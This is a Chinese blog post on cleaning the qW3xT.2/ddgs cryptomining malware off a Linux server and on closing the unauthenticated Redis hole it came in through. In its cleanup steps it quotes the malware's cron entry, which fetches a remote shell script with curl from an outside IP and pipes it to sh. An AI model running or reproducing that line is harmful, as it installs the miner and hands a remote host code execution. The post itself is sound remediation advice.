当前位置: 移动技术网 > 科技>操作系统>Linux > qW3xT.2,解决挖矿病毒。

qW3xT.2,解决挖矿病毒。

2018年09月12日  | 移动技术网科技  | 我要评论

网站在运行期间感觉怪怪的,响应速度慢的不是一丁半点,带宽5m,不该是这样的呀

于是登录xshell

top命令

查看cpu情况如下

pid为3435的进程占用cpu过大,难道被病毒入侵了吗?

查看该进程文件的绝对路径

cd /proc/3435

发现上述红框文件,于是上网搜索了下,得治是挖矿病毒

处理办法

  1、删除tmp目录里的qw3xt.2和ddgs.3013文件。

  2、删除定时任务crontab -l 查看是否有异常*/15 * * * * curl -fssl http://149.56.106.215:8000/i.sh | sh。(与计划任务相同) crontab -e 进入编辑 删除异常任务。

  3、进入var/spool/cron目录,文件打开root文件查看是否有异常,删除异常,再进crontabs文件里对root文件进行查看编辑,删除异常定时任务并保存。

防止再次侵入病毒解决办法

  解决redis入口问题,因为最开始没有设置密码,所以首先修改redis.conf。设置密码,然后重启redis

 

 到此也就解决了删除了挖矿病毒问题。

感谢大家浏览到此处~~~~

如对本文有疑问, 点击进行留言回复!!

相关文章:

验证码:
移动技术网